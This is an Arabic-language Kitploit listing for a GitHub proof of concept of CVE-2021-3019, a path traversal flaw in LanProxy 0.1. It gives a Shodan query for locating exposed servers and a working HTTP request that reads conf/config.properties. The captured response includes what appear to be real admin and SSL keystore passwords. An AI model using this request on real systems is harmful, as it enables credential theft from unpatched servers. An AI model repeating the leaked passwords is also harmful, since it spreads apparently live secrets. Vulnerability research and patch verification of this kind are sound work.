Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-3019 — [CVE-2021-3019] LanProxy اجتياز الدليل | Kitploit
أدوات/GitHubGitHub/murataydemir/cve-2021-3019
تحليل الثغرات الأمنيةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقسوء التكوين
GitHubmurataydemir/cve-2021-3019

CVE-2021-3019

[CVE-2021-3019] LanProxy اجتياز الدليل

عرض المستودع
117منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

[CVE-2021-3019] ثغرة اجتياز الدليل في LanProxy


LanProxy هي أداة اختراق شبكة داخلية تقوم بوكالة أجهزة الكمبيوتر والخوادم المحلية (LAN) إلى الشبكة العامة. وهي تدعم إعادة توجيه حركة مرور TCP وتدعم أي بروتوكول طبقة عليا من TCP (الوصول إلى مواقع الشبكة الداخلية، تصحيح واجهة الدفع المحلية، الوصول عبر SSH، سطح المكتب البعيد، إلخ). إصدار LanProxy 0.1 عرضة لثغرة اجتياز المسار التي قد تسمح بقراءة conf/config.properties للحصول على بيانات الاعتماد للاتصال بالشبكة الداخلية.

بحث Shodan: "Server: LPS-0.1"

قراءة ملف التهيئة

GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1

server.bind=0.0.0.0

#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900

#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay

#这个配置可以忽略
server.ssl.needsClientAuth=false

#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0

#后台控制面板端口(安全组放行端口)
config.server.port=8090

#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr

صورة لـ PoC صورة لـ PoC صورة لـ PoC

تنزيل الأداة